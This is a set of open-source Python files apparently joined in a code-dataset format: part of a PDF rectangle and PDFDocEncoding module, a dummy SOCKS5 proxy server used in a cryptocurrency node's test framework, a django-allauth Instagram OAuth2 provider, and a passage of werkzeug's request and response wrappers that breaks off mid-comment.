def getUpperLeft_y(self):
return self.getUpperRight_y()
def getLowerRight_x(self):
return self.getUpperRight_x()
def getLowerRight_y(self):
return self.getLowerLeft_y()
def getLowerLeft(self):
return self.getLowerLeft_x(), self.getLowerLeft_y()
def getLowerRight(self):
return self.getLowerRight_x(), self.getLowerRight_y()
def getUpperLeft(self):
return self.getUpperLeft_x(), self.getUpperLeft_y()
def getUpperRight(self):
return self.getUpperRight_x(), self.getUpperRight_y()
def setLowerLeft(self, value):
self[0], self[1] = [self.ensureIsNumber(x) for x in value]
def setLowerRight(self, value):
self[2], self[1] = [self.ensureIsNumber(x) for x in value]
def setUpperLeft(self, value):
self[0], self[3] = [self.ensureIsNumber(x) for x in value]
def setUpperRight(self, value):
self[2], self[3] = [self.ensureIsNumber(x) for x in value]
def getWidth(self):
return self.getUpperRight_x() - self.getLowerLeft_x()
def getHeight(self):
return self.getUpperRight_y() - self.getLowerLeft_x()
lowerLeft = property(getLowerLeft, setLowerLeft, None, None)
lowerRight = property(getLowerRight, setLowerRight, None, None)
upperLeft = property(getUpperLeft, setUpperLeft, None, None)
upperRight = property(getUpperRight, setUpperRight, None, None)
def encode_pdfdocencoding(unicode_string):
retval = ''
for c in unicode_string:
try:
retval += chr(_pdfDocEncoding_rev[c])
except KeyError:
raise UnicodeEncodeError("pdfdocencoding", c, -1, -1,
"does not exist in translation table")
return retval
def decode_pdfdocencoding(byte_array):
retval = u''
for b in byte_array:
c = _pdfDocEncoding[ord(b)]
if c == u'\u0000':
raise UnicodeDecodeError("pdfdocencoding", b, -1, -1,
"does not exist in translation table")
retval += c
return retval
_pdfDocEncoding = (
u'\u0000', u'\u0000', u'\u0000', u'\u0000', u'\u0000', u'\u0000', u'\u0000', u'\u0000',
u'\u0000', u'\u0000', u'\u0000', u'\u0000', u'\u0000', u'\u0000', u'\u0000', u'\u0000',
u'\u0000', u'\u0000', u'\u0000', u'\u0000', u'\u0000', u'\u0000', u'\u0000', u'\u0000',
u'\u02d8', u'\u02c7', u'\u02c6', u'\u02d9', u'\u02dd', u'\u02db', u'\u02da', u'\u02dc',
u'\u0020', u'\u0021', u'\u0022', u'\u0023', u'\u0024', u'\u0025', u'\u0026', u'\u0027',
u'\u0028', u'\u0029', u'\u002a', u'\u002b', u'\u002c', u'\u002d', u'\u002e', u'\u002f',
u'\u0030', u'\u0031', u'\u0032', u'\u0033', u'\u0034', u'\u0035', u'\u0036', u'\u0037',
u'\u0038', u'\u0039', u'\u003a', u'\u003b', u'\u003c', u'\u003d', u'\u003e', u'\u003f',
u'\u0040', u'\u0041', u'\u0042', u'\u0043', u'\u0044', u'\u0045', u'\u0046', u'\u0047',
u'\u0048', u'\u0049', u'\u004a', u'\u004b', u'\u004c', u'\u004d', u'\u004e', u'\u004f',
u'\u0050', u'\u0051', u'\u0052', u'\u0053', u'\u0054', u'\u0055', u'\u0056', u'\u0057',
u'\u0058', u'\u0059', u'\u005a', u'\u005b', u'\u005c', u'\u005d', u'\u005e', u'\u005f',
u'\u0060', u'\u0061', u'\u0062', u'\u0063', u'\u0064', u'\u0065', u'\u0066', u'\u0067',
u'\u0068', u'\u0069', u'\u006a', u'\u006b', u'\u006c', u'\u006d', u'\u006e', u'\u006f',
u'\u0070', u'\u0071', u'\u0072', u'\u0073', u'\u0074', u'\u0075', u'\u0076', u'\u0077',
u'\u0078', u'\u0079', u'\u007a', u'\u007b', u'\u007c', u'\u007d', u'\u007e', u'\u0000',
u'\u2022', u'\u2020', u'\u2021', u'\u2026', u'\u2014', u'\u2013', u'\u0192', u'\u2044',
u'\u2039', u'\u203a', u'\u2212', u'\u2030', u'\u201e', u'\u201c', u'\u201d', u'\u2018',
u'\u2019', u'\u201a', u'\u2122', u'\ufb01', u'\ufb02', u'\u0141', u'\u0152', u'\u0160',
u'\u0178', u'\u017d', u'\u0131', u'\u0142', u'\u0153', u'\u0161', u'\u017e', u'\u0000',
u'\u20ac', u'\u00a1', u'\u00a2', u'\u00a3', u'\u00a4', u'\u00a5', u'\u00a6', u'\u00a7',
u'\u00a8', u'\u00a9', u'\u00aa', u'\u00ab', u'\u00ac', u'\u0000', u'\u00ae', u'\u00af',
u'\u00b0', u'\u00b1', u'\u00b2', u'\u00b3', u'\u00b4', u'\u00b5', u'\u00b6', u'\u00b7',
u'\u00b8', u'\u00b9', u'\u00ba', u'\u00bb', u'\u00bc', u'\u00bd', u'\u00be', u'\u00bf',
u'\u00c0', u'\u00c1', u'\u00c2', u'\u00c3', u'\u00c4', u'\u00c5', u'\u00c6', u'\u00c7',
u'\u00c8', u'\u00c9', u'\u00ca', u'\u00cb', u'\u00cc', u'\u00cd', u'\u00ce', u'\u00cf',
u'\u00d0', u'\u00d1', u'\u00d2', u'\u00d3', u'\u00d4', u'\u00d5', u'\u00d6', u'\u00d7',
u'\u00d8', u'\u00d9', u'\u00da', u'\u00db', u'\u00dc', u'\u00dd', u'\u00de', u'\u00df',
u'\u00e0', u'\u00e1', u'\u00e2', u'\u00e3', u'\u00e4', u'\u00e5', u'\u00e6', u'\u00e7',
u'\u00e8', u'\u00e9', u'\u00ea', u'\u00eb', u'\u00ec', u'\u00ed', u'\u00ee', u'\u00ef',
u'\u00f0', u'\u00f1', u'\u00f2', u'\u00f3', u'\u00f4', u'\u00f5', u'\u00f6', u'\u00f7',
u'\u00f8', u'\u00f9', u'\u00fa', u'\u00fb', u'\u00fc', u'\u00fd', u'\u00fe', u'\u00ff'
)
assert len(_pdfDocEncoding) == 256
_pdfDocEncoding_rev = {}
for i in xrange(256):
char = _pdfDocEncoding[i]
if char == u"\u0000":
continue
assert char not in _pdfDocEncoding_rev
_pdfDocEncoding_rev[char] = i
| agpl-3.0 |
namuyan/kumacoin | test/functional/test_framework/socks5.py | 18 | 5690 | #!/usr/bin/env python3
# Copyright (c) 2015-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Dummy Socks5 server for testing."""
import socket
import threading
import queue
import logging
logger = logging.getLogger("TestFramework.socks5")
# Protocol constants
class Command:
CONNECT = 0x01
class AddressType:
IPV4 = 0x01
DOMAINNAME = 0x03
IPV6 = 0x04
# Utility functions
def recvall(s, n):
"""Receive n bytes from a socket, or fail."""
rv = bytearray()
while n > 0:
d = s.recv(n)
if not d:
raise IOError('Unexpected end of stream')
rv.extend(d)
n -= len(d)
return rv
# Implementation classes
class Socks5Configuration():
"""Proxy configuration."""
def __init__(self):
self.addr = None # Bind address (must be set)
self.af = socket.AF_INET # Bind address family
self.unauth = False # Support unauthenticated
self.auth = False # Support authentication
class Socks5Command():
"""Information about an incoming socks5 command."""
def __init__(self, cmd, atyp, addr, port, username, password):
self.cmd = cmd # Command (one of Command.*)
self.atyp = atyp # Address type (one of AddressType.*)
self.addr = addr # Address
self.port = port # Port to connect to
self.username = username
self.password = password
def __repr__(self):
return 'Socks5Command(%s,%s,%s,%s,%s,%s)' % (self.cmd, self.atyp, self.addr, self.port, self.username, self.password)
class Socks5Connection():
def __init__(self, serv, conn, peer):
self.serv = serv
self.conn = conn
self.peer = peer
def handle(self):
"""Handle socks5 request according to RFC192."""
try:
# Verify socks version
ver = recvall(self.conn, 1)[0]
if ver != 0x05:
raise IOError('Invalid socks version %i' % ver)
# Choose authentication method
nmethods = recvall(self.conn, 1)[0]
methods = bytearray(recvall(self.conn, nmethods))
method = None
if 0x02 in methods and self.serv.conf.auth:
method = 0x02 # username/password
elif 0x00 in methods and self.serv.conf.unauth:
method = 0x00 # unauthenticated
if method is None:
raise IOError('No supported authentication method was offered')
# Send response
self.conn.sendall(bytearray([0x05, method]))
# Read authentication (optional)
username = None
password = None
if method == 0x02:
ver = recvall(self.conn, 1)[0]
if ver != 0x01:
raise IOError('Invalid auth packet version %i' % ver)
ulen = recvall(self.conn, 1)[0]
username = str(recvall(self.conn, ulen))
plen = recvall(self.conn, 1)[0]
password = str(recvall(self.conn, plen))
# Send authentication response
self.conn.sendall(bytearray([0x01, 0x00]))
# Read connect request
ver, cmd, _, atyp = recvall(self.conn, 4)
if ver != 0x05:
raise IOError('Invalid socks version %i in connect request' % ver)
if cmd != Command.CONNECT:
raise IOError('Unhandled command %i in connect request' % cmd)
if atyp == AddressType.IPV4:
addr = recvall(self.conn, 4)
elif atyp == AddressType.DOMAINNAME:
n = recvall(self.conn, 1)[0]
addr = recvall(self.conn, n)
elif atyp == AddressType.IPV6:
addr = recvall(self.conn, 16)
else:
raise IOError('Unknown address type %i' % atyp)
port_hi,port_lo = recvall(self.conn, 2)
port = (port_hi << 8) | port_lo
# Send dummy response
self.conn.sendall(bytearray([0x05, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00]))
cmdin = Socks5Command(cmd, atyp, addr, port, username, password)
self.serv.queue.put(cmdin)
logger.info('Proxy: %s', cmdin)
# Fall through to disconnect
except Exception as e:
logger.exception("socks5 request handling failed.")
self.serv.queue.put(e)
finally:
self.conn.close()
class Socks5Server():
def __init__(self, conf):
self.conf = conf
self.s = socket.socket(conf.af)
self.s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.s.bind(conf.addr)
self.s.listen(5)
self.running = False
self.thread = None
self.queue = queue.Queue() # report connections and exceptions to client
def run(self):
while self.running:
(sockconn, peer) = self.s.accept()
if self.running:
conn = Socks5Connection(self, sockconn, peer)
thread = threading.Thread(None, conn.handle)
thread.daemon = True
thread.start()
def start(self):
assert(not self.running)
self.running = True
self.thread = threading.Thread(None, self.run)
self.thread.daemon = True
self.thread.start()
def stop(self):
self.running = False
# connect to self to end run loop
s = socket.socket(self.conf.af)
s.connect(self.conf.addr)
s.close()
self.thread.join()
| mit |
owais/django-allauth | allauth/socialaccount/providers/instagram/provider.py | 75 | 1150 | from allauth.socialaccount import providers
from allauth.socialaccount.providers.base import ProviderAccount
from allauth.socialaccount.providers.oauth2.provider import OAuth2Provider
class InstagramAccount(ProviderAccount):
PROFILE_URL = 'http://instagram.com/'
def get_profile_url(self):
return self.PROFILE_URL + self.account.extra_data.get('username')
def get_avatar_url(self):
return self.account.extra_data.get('profile_picture')
def to_str(self):
dflt = super(InstagramAccount, self).to_str()
return self.account.extra_data.get('username', dflt)
class InstagramProvider(OAuth2Provider):
id = 'instagram'
name = 'Instagram'
package = 'allauth.socialaccount.providers.instagram'
account_class = InstagramAccount
def extract_extra_data(self, data):
return data.get('data', {})
def get_default_scope(self):
return ['basic']
def extract_uid(self, data):
return str(data['data']['id'])
def extract_common_fields(self, data):
return dict(username=data['data'].get('username'))
providers.registry.register(InstagramProvider)
| mit |
codeworldprodigy/lab2 | lib/werkzeug/wrappers.py | 298 | 76131 | # -*- coding: utf-8 -*-
"""
werkzeug.wrappers
~~~~~~~~~~~~~~~~~
The wrappers are simple request and response objects which you can
subclass to do whatever you want them to do. The request object contains
the information transmitted by the client (webbrowser) and the response
object contains all the information sent back to the browser.
An important detail is that the request object is created with the WSGI
environ and will act as high-level proxy whereas the response object is an
actual WSGI application.
Like everything else in Werkzeug these objects will work correctly with
unicode data. Incoming form data parsed by the response object will be
decoded into an unicode object if possible and if it makes sense.
:copyright: (c) 2013 by the Werkzeug Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from functools import update_wrapper
from datetime import datetime, timedelta
from werkzeug.http import HTTP_STATUS_CODES, \
parse_accept_header, parse_cache_control_header, parse_etags, \
parse_date, generate_etag, is_resource_modified, unquote_etag, \
quote_etag, parse_set_header, parse_authorization_header, \
parse_www_authenticate_header, remove_entity_headers, \
parse_options_header, dump_options_header, http_date, \
parse_if_range_header, parse_cookie, dump_cookie, \
parse_range_header, parse_content_range_header, dump_header
from werkzeug.urls import url_decode, iri_to_uri, url_join
from werkzeug.formparser import FormDataParser, default_stream_factory
from werkzeug.utils import cached_property, environ_property, \
header_property, get_content_type
from werkzeug.wsgi import get_current_url, get_host, \
ClosingIterator, get_input_stream, get_content_length
from werkzeug.datastructures import MultiDict, CombinedMultiDict, Headers, \
EnvironHeaders, ImmutableMultiDict, ImmutableTypeConversionDict, \
ImmutableList, MIMEAccept, CharsetAccept, LanguageAccept, \
ResponseCacheControl, RequestCacheControl, CallbackDict, \
ContentRange, iter_multi_items
from werkzeug._internal import _get_environ
from werkzeug._compat import to_bytes, string_types, text_type, \
integer_types, wsgi_decoding_dance, wsgi_get_bytes, \
to_unicode, to_native, BytesIO
def _run_wsgi_app(*args):
"""This function replaces itself to ensure that the test module is not
imported unless required. DO NOT USE!
"""
global _run_wsgi_app
from werkzeug.test import run_wsgi_app as _run_wsgi_app
return _run_wsgi_app(*args)
def _warn_if_string(iterable):
"""Helper for the response objects to check if the iterable returned
to the WSGI server is not a string.
"""
if isinstance(iterable, string_types):
from warnings import warn
warn(Warning('response iterable was set to a string. This appears '
'to work but means that the server will send the '
'data to the client char, by char. This is almost '
'never intended behavior, use response.data to assign '
'strings to the response object.'), stacklevel=2)
def _assert_not_shallow(request):
if request.shallow:
raise RuntimeError('A shallow request tried to consume '
'form data. If you really want to do '
'that, set `shallow` to False.')
def _iter_encoded(iterable, charset):
for item in iterable:
if isinstance(item, text_type):
yield item.encode(charset)
else:
yield item
class BaseRequest(object):
"""Very basic request object. This does not implement advanced stuff like
entity tag parsing or cache controls. The request object is created with
the WSGI environment as first argument and will add itself to the WSGI
environment as ``'werkzeug.request'`` unless it's created with
`populate_request` set to False.
There are a couple of mixins available that add additional functionality
to the request object, there is also a class called `Request` which
subclasses `BaseRequest` and all the important mixins.
It's a good idea to create a custom subclass of the :class:`BaseRequest`
and add missing functionality either via mixins or direct implementation.
Here an example for such subclasses::
from werkzeug.wrappers import BaseRequest, ETagRequestMixin
class Request(BaseRequest, ETagRequestMixin):
pass
Request objects are **read only**. As of 0.5 modifications are not
allowed in any place. Unlike the lower level parsing functions the
request object will use immutable objects everywhere possible.
Per default the request object will assume all the text data is `utf-8`
encoded. Please refer to `the unicode chapter <unicode.txt>`_ for more
details about customizing the behavior.
Per default the request object will be added to the WSGI
environment as `werkzeug.request` to support the debugging system.
If you don't want that, set `populate_request` to `False`.
If `shallow` is `True` the environment is initialized as shallow
object around the environ. Every operation that would modify the
environ in any way (such as consuming form data) raises an exception
unless the `shallow` attribute is explicitly set to `False`. This
is useful for middlewares where you don't want to consume the form
data by accident. A shallow request is not populated to the WSGI
environment.
.. versionchanged:: 0.5
read-only mode was enforced by using immutables classes for all
data.
"""
#: the charset for the request, defaults to utf-8
charset = 'utf-8'
#: the error handling procedure for errors, defaults to 'replace'
encoding_errors = 'replace'
#: the maximum content length. This is forwarded to the form data
#: parsing function (:func:`parse_form_data`). When set and the
#: :attr:`form` or :attr:`files` attribute is accessed and the
#: parsing fails because more than the specified value is transmitted
#: a :exc:`~werkzeug.exceptions.RequestEntityTooLarge` exception is raised.
#:
#: Have a look at :ref:`dealing-with-request-data` for more details.
#:
#: .. versionadded:: 0.5
max_content_length = None
#: the maximum form field size. This is forwarded to the form data
#: parsing function (:func:`parse_form_data`). When set and the
#: :attr:`form` or :attr:`files` attribute is accessed and the
#: data in memory for post data is longer than the specified value a
#: :exc:`~werkzeug.exceptions.RequestEntityTooLarge` exception is raised.
#:
#: Have a look at :ref:`dealing-with-request-data` for more details.
#:
#: .. versionadded:: 0.5
max_form_memory_size = None
#: the class to use for `args` and `form`. The default is an
#: :class:`~werkzeug.datastructures.ImmutableMultiDict` which supports
#: multiple values per key. alternatively it makes sense to use an
#: :class:`~werkzeug.datastructures.ImmutableOrderedMultiDict` which
#: preserves order or a :class:`~werkzeug.datastructures.ImmutableDict`
#: which is the fastest but only remembers the last key. It is also
#: possible to use mutable structures, but this is not recommended.
#:
#: .. versionadded:: 0.6
parameter_storage_class = ImmutableMultiDict
#: the type to be used for list values from the incoming WSGI environment.
#: By default an :class:`~werkzeug.datastructures.ImmutableList` is used
#: (for example for :attr:`access_list`).
#:
#: .. versionadded:: 0.6
list_storage_class = ImmutableList
#: the type to be used for dict values from the incoming WSGI environment.
#: By default an
#: :class:`~werkzeug.datastructures.ImmutableTypeConversionDict` is used
#: (for example for :attr:`cookies`).
#:
#: .. versionadded:: 0.6
dict_storage_class = ImmutableTypeConversionDict
#: The form data parser that shoud be used. Can be replaced to customize
#: the form date parsing.
form_data_parser_class = FormDataParser
#: Optionally a list of hosts that is trusted by this request. By default
#: all hosts are trusted which means that whatever the client sends the
#: host is will be accepted. This is the recommended setup as a webserver
#: should manually be set up to not route invalid hosts to the application.
#:
#: .. versionadded:: 0.9
trusted_hosts = None
#: Indicates weather the data descriptor should be allowed to read and
#: buffer up the input stream. By default it's enabled.
#:
#: .. versionadded:: 0.9
disable_data_descriptor = False
def __init__(self, environ, populate_request=True, shallow=False):
self.environ = environ
if populate_request and not shallow:
self.environ['werkzeug.request'] = self
self.shallow = shallow
def __repr__(self):
# make sure the __repr__ even works if the request was created
# from an invalid WSGI environment. If we display the request
# in a debug session we don't want the repr to blow up.
args = []
try:
args.append("'%s'" % self.url)
args.append('[%s]' % self.method)
except Exception:
args.append('(invalid WSGI environ)')
return '<%s %s>' % (
self.__class__.__name__,
' '.join(args)
)
@property
def url_charset(self):
"""The charset that is assumed for URLs. Defaults to the value
of :attr:`charset`.
.. versionadded:: 0.6
"""
return self.charset
@classmethod
def from_values(cls, *args, **kwargs):
"""Create a new request object based on the values provided. If
environ is given missing values are filled from there. This method is
useful for small scripts when you need to simulate a request from an URL.
Do not use this method for unittesting, there is a full featured client
object (:class:`Client`) that allows to create multipart requests,
support for cookies etc.
This accepts the same options as the
:class:`~werkzeug.test.EnvironBuilder`.
.. versionchanged:: 0.5
This method now accepts the same arguments as
:class:`~werkzeug.test.EnvironBuilder`. Because of this the
`environ` parameter is now called `environ_overrides`.
:return: request object
"""
from werkzeug.test import EnvironBuilder
charset = kwargs.pop('charset', cls.charset)
builder = EnvironBuilder(*args, **kwargs)
try:
return builder.get_request(cls)
finally:
builder.close()
@classmethod
def application(cls, f):
"""Decorate a function as responder that accepts the request as first
argument. This works like the :func:`responder` decorator but the
function is passed the request object as first argument and the
request object will be closed automatically::
@Request.application
def my_wsgi_app(request):
return Response('Hello World!')
:param f: the WSGI callable to decorate
:return: a new WSGI callable
"""
#: return a callable that wraps the -2nd argument with the request
#: and calls the function with all the arguments up to that one and
#: the request. The return value is then called with the latest
#: two arguments. This makes it possible to use this decorator for
#: both methods and standalone WSGI functions.
def application(*args):
request = cls(args[-2])
with request:
return f(*args[:-2] + (request,))(*args[-2:])
return update_wrapper(application, f)
def _get_file_stream(self, total_content_length, content_type, filename=None,
content_length=None):
"""Called to get a stream for the file upload.
This must provide a file-like class with `read()`, `readline()`
and `seek()` methods that is both writeable and readable.
The default implementation returns a temporary file if the total
content length is higher than 500KB. Because many browsers do not
provide a content length for the files only the total content
length matters.
:param total_content_length: the total content length of all the
data in the request combined. This value
is guaranteed to be there.
:param content_type: the mimetype of the uploaded file.
:param filename: the filename of the uploaded file. May be `None`.
:param content_length: the length of this file. This value is usually
not provided because webbrowsers do not provide
this value.
"""
return default_stream_factory(total_content_length, content_type,
filename, content_length)
@property
def want_form_data_parsed(self):
"""Returns True if the request method carries content. As of
Werkzeug 0.9 this will be the case if a content type is transmitted.
.. versionadded:: 0.8
"""
return bool(self.environ.get('CONTENT_TYPE'))
def make_form_data_parser(self):
"""Creates the form data parser. Instanciates the
:attr:`form_data_parser_class` with some parameters.
.. versionadded:: 0.8
"""
return self.form_data_parser_class(self._get_file_stream,
self.charset,
self.encoding_errors,
self.max_form_memory_size,
self.max_content_length,
self.parameter_storage_class)
def _load_form_data(self):
"""Method used internally to retrieve submitted data. After calling
this sets `form` and `files` on the request object to multi dicts
filled with the incoming form data. As a matter of fact the input
stream will be empty afterwards. You can also call this method to
force the parsing of the form data.
.. versionadded:: 0.8
"""
# abort early if we have already consumed the stream
if 'form' in self.__dict__:
return
_assert_not_shallow(self)
if self.want_form_data_parsed:
content_type = self.environ.get('CONTENT_TYPE', '')
content_length = get_content_length(self.environ)
mimetype, options = parse_options_header(content_type)
parser = self.make_form_data_parser()
data = parser.parse(self._get_stream_for_parsing(),
mimetype, content_length, options)
else:
data = (self.stream, self.parameter_storage_class(),
self.parameter_storage_class())
# inject the values into the instance dict so that we bypass
# our cached_property non-data descriptor.
d = self.__dict__
d['stream'], d['form'], d['files'] = data
def _get_stream_for_parsing(self):
"""This is the same as accessing :attr:`stream` with the difference
that if it finds cached data from calling :meth:`get_data` first it
will create a new stream out of the cached data.
.. versionadded:: 0.9.3
"""
cached_data = getattr(self, '_cached_data', None)
if cached_data is not None:
return BytesIO(cached_data)
return self.stream
def close(self):
"""Closes associated resources of this request object. This
closes all file handles explicitly. You can also use the request
object in a with statement with will automatically close it.
.. versionadded:: 0.9
"""
files = self.__dict__.get('files')
for key, value in iter_multi_items(files or ()):
value.close()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, tb):
self.close()
@cached_property
def stream(self):
"""The stream to read incoming data from. Unlike :attr:`input_stream`
this stream is properly guarded that you can't accidentally read past
the length of the input. Werkzeug will internally always refer to
this stream to read data which makes it possible to wrap this
object with a stream that does filtering.
.. versionchanged:: 0.9
This stream is now always available but might be consumed by the
form parser later on. Previously the stream was only set if no
parsing happened.
"""
_assert_not_shallow(self)
return get_input_stream(self.environ)
input_stream = environ_property('wsgi.input', 'The WSGI input stream.\n'
'In general it\'s a bad idea to use this one because you can easily '
'read past the boundary. Use the :attr:`stream` instead.')
@cached_property
def args(self):
"""The parsed URL parameters. By default an
:class:`~werkzeug.datastructures.ImmutableMultiDict`
is returned from this function. This can be changed by setting
:attr:`parameter_storage_class` to a different type. This might
be necessary if the order of the form data is important.
"""
return url_decode(wsgi_get_bytes(self.environ.get('QUERY_STRING', '')),
self.url_charset, errors=self.encoding_errors,
cls=self.parameter_storage_class)
@cached_property
def data(self):
if self.disable_data_descriptor:
raise AttributeError('data descriptor is disabled')
# XXX: this should eventually be deprecated.
# We trigger form data parsing first which means that the descriptor
# will not cache the data that would otherwise be .form or .files
# data. This restores the behavior that was there in Werkzeug
# before 0.9. New code should use :meth:`get_data` explicitly as
# this will make behavior explicit.
return self.get_data(parse_form_data=True)
def get_data(self, cache=True, as_text=False, parse_form_data=False):
"""This reads the buffered incoming data from the client into one
bytestring. By default this is cached but that behavior can be
changed by setting `cache` to `False`.
Usually it's a bad idea to call this method without checking the
content length first as a client could send dozens of megabytes or more
to cause memory problems on the server.
Note that if the form data was already parsed this method will not
return anything as form data parsing does not cache the data like
this method does. To implicitly invoke form data parsing function
set `parse_form_data` to `True`. When this is done the return value
of this method will be an empty string if the form parser handles
the data. This generally is not necessary as if the whole data is
cached (which is the default) the form parser will used the cached
data to parse the form data. Please be generally aware of checking
the content length first in any case before calling this method
to avoid exhausting server memory.
If `as_text` is set to `True` the return value will be a decoded
unicode string.
.. versionadded:: 0.9
"""
rv = getattr(self, '_cached_data', None)
if rv is None:
if parse_form_data:
self._load_form_data()
rv = self.stream.read()
if cache:
self._cached_data = rv
if as_text:
rv = rv.decode(self.charset, self.encoding_errors)
return rv
@cached_property
def form(self):
"""The form parameters. By default an
:class:`~werkzeug.datastructures.ImmutableMultiDict`
is returned from this function. This can be changed by setting
:attr:`parameter_storage_class` to a different type. This might
be necessary if the order of the form data is important.
"""
self._load_form_data()
return self.form
@cached_property
def values(self):
"""Combined multi dict for :attr:`args` and :attr:`form`."""
args = []
for d in self.args, self.form:
if not isinstance(d, MultiDict):
d = MultiDict(d)
args.append(d)
return CombinedMultiDict(args)
@cached_property
def files(self):
""":class:`~werkzeug.datastructures.MultiDict` object containing
all uploaded files. Each key in :attr:`files` is the name from the
``<input type="file" name="">``. Each value in :attr:`files` is a
Werkzeug :class:`~werkzeug.datastructures.FileStorage` object.
Note that :attr:`files` will only contain data if the request method was
POST, PUT or PATCH and the ``<form>`` that posted to the request had
``enctype="multipart/form-data"``. It will be empty otherwise.
See the :class:`~werkzeug.datastructures.MultiDict` /
:class:`~werkzeug.datastructures.FileStorage` documentation for
more details about the used data structure.
"""
self._load_form_data()
return self.files
@cached_property
def cookies(self):
"""Read only access to the retrieved cookie values as dictionary."""
return parse_cookie(self.environ, self.charset,
self.encoding_errors,
cls=self.dict_storage_class)
@cached_property
def headers(self):
"""The headers from the WSGI environ as immutable
:class:`~werkzeug.datastructures.EnvironHeaders`.
"""
return EnvironHeaders(self.environ)
@cached_property
def path(self):
"""Requested path as unicode. This works a bit like the regular path
info in the WSGI environment but will always include a leading slash,
even if the URL root is accessed.
"""
raw_path = wsgi_decoding_dance(self.environ.get('PATH_INFO') or '',
self.charset, self.encoding_errors)
return '/' + raw_path.lstrip('/')
@cached_property
def full_path(self):
"""Requested path as unicode, including the query string."""
return self.path + u'?' + to_unicode(self.query_string, self.url_charset)
@cached_property
def script_root(self):
"""The root path of the script without the trailing slash."""
raw_path = wsgi_decoding_dance(self.environ.get('SCRIPT_NAME') or '',
self.charset, self.encoding_errors)
return raw_path.rstrip('/')
@cached_property
def url(self):
"""The reconstructed current URL"""
return get_current_url(self.environ,
trusted_hosts=self.trusted_hosts)
@cached_property
def base_url(self):
"""Like :attr:`url` but without the querystring"""
return get_current_url(self.environ, strip_querystring=True,
trusted_hosts=self.trusted_hosts)
@cached_property
def url_root(self):
"""The full URL root (with hostname), this is the application root."""
return get_current_url(self.environ, True,
trusted_hosts=self.trusted_hosts)
@cached_property
def host_url(self):
"""Just the host with scheme."""
return get_current_url(self.environ, host_only=True,
trusted_hosts=self.trusted_hosts)
@cached_property
def host(self):
"""Just the host including the port if available."""
return get_host(self.environ, trusted_hosts=self.trusted_hosts)
query_string = environ_property('QUERY_STRING', '', read_only=True,
load_func=wsgi_get_bytes, doc=
'''The URL parameters as raw bytestring.''')
method = environ_property('REQUEST_METHOD', 'GET', read_only=True, doc=
'''The transmission method. (For example ``'GET'`` or ``'POST'``).''')
@cached_property
def access_route(self):
"""If a forwarded header exists this is a list of all ip addresses
from the client ip to the last proxy server.
"""
if 'HTTP_X_FORWARDED_FOR' in self.environ:
addr = self.environ['HTTP_X_FORWARDED_FOR'].split(',')
return self.list_storage_class([x.strip() for x in addr])
elif 'REMOTE_ADDR' in self.environ:
return self.list_storage_class([self.environ['REMOTE_ADDR']])
return self.list_storage_class()
@property
def remote_addr(self):
"""The remote address of the client."""
return self.environ.get('REMOTE_ADDR')
remote_user = environ_property('REMOTE_USER', doc='''
If the server supports user authentication, and the script is
protected, this attribute contains the username the user has
authenticated as.''')
scheme = environ_property('wsgi.url_scheme', doc='''
URL scheme (http or https).
.. versionadded:: 0.7''')
is_xhr = property(lambda x: x.environ.get('HTTP_X_REQUESTED_WITH', '')
.lower() == 'xmlhttprequest', doc='''
True if the request was triggered via a JavaScript XMLHttpRequest.
This only works with libraries that support the `X-Requested-With`
header and set it to "XMLHttpRequest". Libraries that do that are
prototype, jQuery and Mochikit and probably some more.''')
is_secure = property(lambda x: x.environ['wsgi.url_scheme'] == 'https',
doc='`True` if the request is secure.')
is_multithread = environ_property('wsgi.multithread', doc='''
boolean that is `True` if the application is served by
a multithreaded WSGI server.''')
is_multiprocess = environ_property('wsgi.multiprocess', doc='''
boolean that is `True` if the application is served by
a WSGI server that spawns multiple processes.''')
is_run_once = environ_property('wsgi.run_once', doc='''
boolean that is `True` if the application will be executed only
once in a process lifetime. This is the case for CGI for example,
but it's not guaranteed that the exeuction only happens one time.''')
class BaseResponse(object):
"""Base response class. The most important fact about a response object
is that it's a regular WSGI application. It's initialized with a couple
of response parameters (headers, body, status code etc.) and will start a
valid WSGI response when called with the environ and start response
callable.
Because it's a WSGI application itself processing usually ends before the
actual response is sent to the server. This helps debugging systems
because they can catch all the exceptions before responses are started.
Here a small example WSGI application that takes advantage of the
response objects::
from werkzeug.wrappers import BaseResponse as Response
def index():
return Response('Index page')
def application(environ, start_response):
path = environ.get('PATH_INFO') or '/'
if path == '/':
response = index()
else:
response = Response('Not Found', status=404)
return response(environ, start_response)
Like :class:`BaseRequest` which object is lacking a lot of functionality
implemented in mixins. This gives you a better control about the actual
API of your response objects, so you can create subclasses and add custom
functionality. A full featured response object is available as
:class:`Response` which implements a couple of useful mixins.
To enforce a new type of already existing responses you can use the
:meth:`force_type` method. This is useful if you're working with different
subclasses of response objects and you want to post process them with a
know interface.
Per default the request object will assume all the text data is `utf-8`
encoded. Please refer to `the unicode chapter <unicode.txt>`_ for more
details about customizing the behavior.
Response can be any kind of iterable or string. If it's a string it's
considered being an iterable with one item which is the string passed.
Headers can be a list of tuples or a
:class:`~werkzeug.datastructures.Headers` object.
Special note for `mimetype` and `content_type`: For most mime types
`mimetype` and `content_type` work the same, the difference affects
only 'text' mimetypes. If the mimetype passed with `mimetype` is a
mimetype starting with `text/`, the charset parameter of the response
object is appended to it. In contrast the `content_type` parameter is
always added as header unmodified.
.. versionchanged:: 0.5
the `direct_passthrough` parameter was added.
:param response: a string or response iterable.
:param status: a string with a status or an integer with the status code.
:param headers: a list of headers or a
:class:`~werkzeug.datastructures.Headers` object.
:param mimetype: the mimetype for the request. See notice above.
:param content_type: the content type for the request. See notice above.
:param direct_passthrough: if set to `True` :meth:`iter_encoded` is not
called before iteration which makes it
possible to pass special iterators though
unchanged (see :func:`wrap_file` for more
details.)
"""
#: the charset of the response.
charset = 'utf-8'
#: the default status if none is provided.
default_status = 200
#: the default mimetype if none is provided.
default_mimetype = 'text/plain'
#: if set to `False` accessing properties on the response object will
#: not try to consume the response iterator and convert it into a list.
#:
#: .. versionadded:: 0.6.2
#:
#: That attribute was previously called `implicit_seqence_conversion`.
#: (Notice the typo). If you did use this feature, you have to adapt
#: your code to the name change.
implicit_sequence_conversion = True
#: Should this response object correct the location header to be RFC
#: conformant? This is true by default.
#:
